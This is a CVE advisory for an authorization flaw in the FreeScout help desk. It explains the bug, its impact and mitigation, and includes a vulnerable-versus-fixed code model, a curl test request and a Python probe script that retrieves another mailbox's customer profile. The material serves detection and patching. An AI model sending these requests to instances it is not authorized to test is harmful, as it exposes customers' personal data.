CVE-2026-40570
Insecure Direct Object Reference in FreeScout Exposes Customer PII
Publication date: 2026-04-21
Last updated on: 2026-04-21
Assigner: GitHub, Inc.
Description
Affected Vendors & Products
| Vendor | Product | Version / Range | Status |
|---|---|---|---|
| freescout | freescout | < 1.8.213 (upper bound exclusive) | affected |
| freescout | freescout | 1.8.213 | fixed |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
| CWE-639 | The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-40570 is a vulnerability in FreeScout, a self-hosted help desk system. Before version 1.8.213, the `load_customer_info` action of the POST endpoint `/conversation/ajax` returned the complete customer profile, including all Personally Identifiable Information (PII), to any authenticated user without verifying that the user had access to the associated mailbox.
The root cause is a missing authorization check (CWE-862) on a user-supplied identifier (CWE-639): the handler did consult mailbox access, but only to decide whether to include the customer's previous conversations in the response; the customer record itself was returned regardless of the outcome. Any authenticated user who knows a customer's email address could therefore retrieve that customer's full profile, whatever mailboxes they were assigned to.
Version 1.8.213 fixes this by enforcing the mailbox access check before any customer data is returned, so customer information is only served to users permitted to access the mailbox.
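The following is an added example, not FreeScout's code, that models the flaw in miniature: the same lookup written first with the pre-1.8.213 pattern (mailbox check applied only to the conversation list, PII returned unconditionally) and then with the check moved in front of the lookup. Class names, the in-memory data and the function names are hypothetical. The fixed version also goes one step beyond what the page states: it requires that the customer actually be reachable through the requested mailbox, because a check on `mailbox_id` alone is satisfied by an attacker simply naming a mailbox they are assigned to.

```python
# Added example, not FreeScout's code: a minimal model of the flaw the page
# describes. Class and function names are hypothetical; the real handler is
# the `load_customer_info` action behind POST /conversation/ajax.
from dataclasses import dataclass, field


@dataclass
class Customer:
    email: str
    first_name: str
    phone: str
    mailbox_ids: set = field(default_factory=set)  # mailboxes it has conversations in


@dataclass
class User:
    name: str
    mailbox_ids: set  # mailboxes this agent is permitted to access


# Constructed sample data: Ann has only ever written to mailbox 1 (support);
# Bob is assigned to mailbox 1, Eve only to mailbox 2 (sales).
CUSTOMERS = {
    "ann@example.com": Customer("ann@example.com", "Ann", "+1 555 0100", {1}),
}
USERS = {
    "bob": User("bob", {1}),
    "eve": User("eve", {2}),
}


def customer_pii(c: Customer) -> dict:
    return {"email": c.email, "first_name": c.first_name, "phone": c.phone}


def load_customer_info_vulnerable(user: User, email: str, mailbox_id: int):
    """Pre-1.8.213 pattern: the mailbox check only gates the conversation
    list; the customer record itself goes to any logged-in user."""
    c = CUSTOMERS.get(email)
    if c is None:
        return {"error": "not found"}, 404
    body = {"customer": customer_pii(c)}              # PII leaves unconditionally
    if mailbox_id in user.mailbox_ids:                # check applied too late
        body["conversations"] = sorted(c.mailbox_ids & user.mailbox_ids)
    return body, 200


def load_customer_info_fixed(user: User, email: str, mailbox_id: int):
    """Authorize first, then look anything up."""
    if mailbox_id not in user.mailbox_ids:
        return {"error": "access denied"}, 403
    c = CUSTOMERS.get(email)
    # Beyond what the page states: the customer must be reachable through the
    # requested mailbox, otherwise the caller just names a mailbox they DO
    # have. "No such customer" and "not in this mailbox" get the same 404 so
    # the endpoint does not become an existence oracle.
    if c is None or mailbox_id not in c.mailbox_ids:
        return {"error": "not found"}, 404
    return {"customer": customer_pii(c), "conversations": [mailbox_id]}, 200


if __name__ == "__main__":
    ann = "ann@example.com"
    print(load_customer_info_vulnerable(USERS["eve"], ann, 1))  # leaks Ann's phone
    print(load_customer_info_fixed(USERS["eve"], ann, 1))       # 403
    print(load_customer_info_fixed(USERS["bob"], ann, 1))       # 200, authorized
```

The order of operations is the whole fix: authorization decided before the object is fetched, and the identifier the caller controls (`mailbox_id`) validated against both the caller's rights and the object's actual location.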
How can this vulnerability impact me?
This vulnerability allows anyone holding a valid user account, however limited its mailbox assignments, to retrieve a customer's full Personally Identifiable Information (PII) simply by knowing that customer's email address.
The impact is unauthorized disclosure of sensitive customer data, which can lead to privacy violations, identity theft, and loss of customer trust.
Because the flaw bypasses mailbox access controls, it exposes data that mailbox permissions were meant to confine to specific agents; a low-privileged, shared or compromised agent account becomes a path for insider misuse or bulk data leakage.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
To test for it, log in as an account that does not have access to the target mailbox, then send the `load_customer_info` action to POST `/conversation/ajax` for a customer known to exist in that mailbox. A vulnerable instance returns the customer's profile anyway; a patched instance refuses.
A practical check is to replay the request with curl. The placeholders must be filled from a real browser session: the form field that carries the customer email is not named here, so take its name from the request your browser sends when a conversation's customer details load, and because FreeScout is a Laravel application a POST without the session cookie and matching CSRF token will normally be rejected before the action runs.
- curl -s -X POST -H 'X-Requested-With: XMLHttpRequest' -H 'X-CSRF-TOKEN: <token from the page>' -b '<session cookie from the browser>' -d 'action=load_customer_info&<email field>=customer@example.com&mailbox_id=1' https://your-freescout-instance/conversation/ajax
If the response contains the full customer profile even though the authenticated user has no access to mailbox 1, the instance is vulnerable. A login redirect or a CSRF rejection means the session details are wrong, not that the check passed. A simpler first pass is to read the running version (shown on the admin System page and stored as the `version` entry in `config/app.php`): anything below 1.8.213 is affected. Only test instances you are authorized to test.
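The same check as a small script, added here as an example and not taken from the page or the FreeScout project. It builds the request, sends it without following redirects, and classifies the answer. Everything instance-specific is an assumption to confirm: `EMAIL_PARAM` is a placeholder because the page does not name the field that carries the email, the `X-CSRF-TOKEN` and `X-Requested-With` headers are what a Laravel AJAX endpoint usually expects, and the PII field names are a constructed heuristic list.

```python
# Added example, not from the page or the FreeScout project: a probe for
# CVE-2026-40570 whose request building and response classification can be
# exercised offline. Run it with an account that has NO access to mailbox_id.
import json
import urllib.error
import urllib.parse
import urllib.request

EMAIL_PARAM = "EMAIL_PARAM_PLACEHOLDER"  # not named on the page; copy it from a browser request

# Constructed heuristic list of profile field names; extend with whatever
# your instance actually returns. Two or more hits count as a profile.
PII_MARKERS = ("first_name", "last_name", "phone", "email", "address", "company")


def build_request(base_url, email, mailbox_id, cookie, csrf_token=None):
    """Return (url, body_bytes, headers) for one load_customer_info probe."""
    url = base_url.rstrip("/") + "/conversation/ajax"
    form = {"action": "load_customer_info", EMAIL_PARAM: email, "mailbox_id": str(mailbox_id)}
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",  # assumption: AJAX endpoint expects this
        "Cookie": cookie,                      # the browser's session cookie, verbatim
    }
    if csrf_token:
        headers["X-CSRF-TOKEN"] = csrf_token   # assumption: Laravel CSRF protection
    return url, urllib.parse.urlencode(form).encode(), headers


def classify_response(status, body):
    """Classify one response from an account that must NOT have mailbox access:
    'vulnerable' (a profile came back), 'denied' (401/403), 'no_pii'
    (JSON without profile fields), or 'inconclusive' (redirect, HTML page, etc.)."""
    if status in (401, 403):
        return "denied"
    if status != 200:
        return "inconclusive"
    try:
        data = json.loads(body)
    except ValueError:
        return "inconclusive"  # login page or error HTML, not data
    if not isinstance(data, (dict, list)):
        return "inconclusive"
    hits = {m for m in PII_MARKERS if m in body.lower()}
    return "vulnerable" if len(hits) >= 2 else "no_pii"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface 3xx as-is so a login redirect is not followed and misread."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url, email, mailbox_id, cookie, csrf_token=None, timeout=10):
    url, data, headers = build_request(base_url, email, mailbox_id, cookie, csrf_token)
    req = urllib.request.Request(url, data=data, headers=headers, method="POST")
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as e:
        return classify_response(e.code, e.read().decode(errors="replace"))


if __name__ == "__main__":
    # Example call (hypothetical host and session values):
    print(probe("https://helpdesk.example.com", "customer@example.com", 1,
                "laravel_session=<cookie>", csrf_token="<token>"))
```

Treat `vulnerable` as a finding only after reading the body yourself; the marker heuristic is there to sort responses, not to replace judgement, and `inconclusive` almost always means the session cookie, CSRF token or email field name is wrong rather than that the instance is safe.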
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation is to upgrade FreeScout to version 1.8.213 or later, where the mailbox access check is enforced before customer data is returned.
Until the upgrade can be applied, note that `/conversation/ajax` serves the normal agent interface, so it cannot simply be blocked without breaking the application. Instead, reduce who can authenticate at all: disable unused and departed accounts, avoid shared logins, and watch the web server and application logs for `load_customer_info` requests from users against mailboxes they are not assigned to.
Additionally, review and tighten mailbox assignments so each user holds access only to the mailboxes they need, which limits what any one account can reach after the upgrade as well.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability in FreeScout prior to version 1.8.213 allows any authenticated user to retrieve complete customer profile data, including all Personally Identifiable Information (PII), by providing just a valid email address without verifying mailbox access permissions.
This unauthorized disclosure of customer PII represents a failure to enforce proper authorization controls, which can lead to non-compliance with data protection regulations such as GDPR and HIPAA that require strict safeguards around access to personal and sensitive information.
By exposing customer PII to unauthorized users, the vulnerability increases the risk of data breaches and privacy violations, potentially resulting in regulatory penalties and loss of trust.
The issue was fixed in version 1.8.213 by enforcing stricter access control checks to ensure only authorized users with mailbox access can retrieve customer information, thereby helping to maintain compliance with common data protection standards.